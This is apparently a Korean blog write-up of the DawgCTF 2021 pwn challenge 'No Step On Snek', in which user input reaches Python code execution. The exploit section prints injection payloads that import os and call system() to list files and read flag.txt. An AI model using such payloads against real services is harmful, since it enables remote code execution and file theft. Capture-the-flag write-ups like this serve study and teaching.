[DawgCTF 2021] :pwn: No Step On Snek Write-Up

두비니

·

2021. 5. 14. 08:53

 

No Step On Snek - 75pts

 

 

Description

 

 

Tag

pwnable, python, RCE

 

 

Problem Analysis

 

접속을 하면 이런 창이 나타나는데, 설명에 쓰여져있는 키를 눌러도 아무것도 실행이 되지 않습니다. 그래서 이상한 값을 집어넣는 경우에는 이런게 발생합니다.

 

 

보아하니, make_move(maze)라는 명령어가 실행이 되고, 이때 maze라는 것은 저희의 입력인 것을 알 수 있네요. 이 점을 이용해서 code injection을 실행시켜주면 좋지 않을까 생각합니다.

 

Exploit

 

그래서 확인을 우선 해 봅시다!

 

__builtins__.__dict__['__import__']("os").system("ls")

 

 

 

잘 실행이 되네요. 그래서 바로 flag.txt를 열어보면

 

__builtins__.__dict__['__import__']("os").system("cat flag.txt")

 

 

오...신기신기

pyjail 유형 문제들은 풀어봤는데 이렇게 그냥 아무데나 집어넣어도 이렇게 실행이 잘 되는줄 몰랐습니다ㅎㅎ 재미있었어요!

 

혹시나 이해가 안된다면 이 글을 보시고 오는걸 추천합니다:

https://dokhakdubini.tistory.com/471

 

[Python] Built-in 객체 사용하기, 응용하기 (Python RCE)

Built-in 객체 사용하기, 응용하기 (for CTF) Python built-in functions (Python RCE) 요즘 python으로 포너블 문제가 많이 나오던데, 왠만하면 이거 관련 문제들이여서 한번 정리하려고 합니당 1. __builtin__..

dokhakdubini.tistory.com

 

 

 

끝!

'CTF' 카테고리의 다른 글

[DawgCTF 2021] :pwn: MDL Considered Harmful Write-Up  (0) 2021.05.15
[DawgCTF 2021] :pwn: Bofit Write-Up  (0) 2021.05.14
[DawgCTF 2021] Write-Up :Misc:  (0) 2021.05.11
[CodeFest 2021] :pwn: Write-Up  (0) 2021.03.20
[PoseidonCTF 2020] misc write-up  (0) 2020.08.10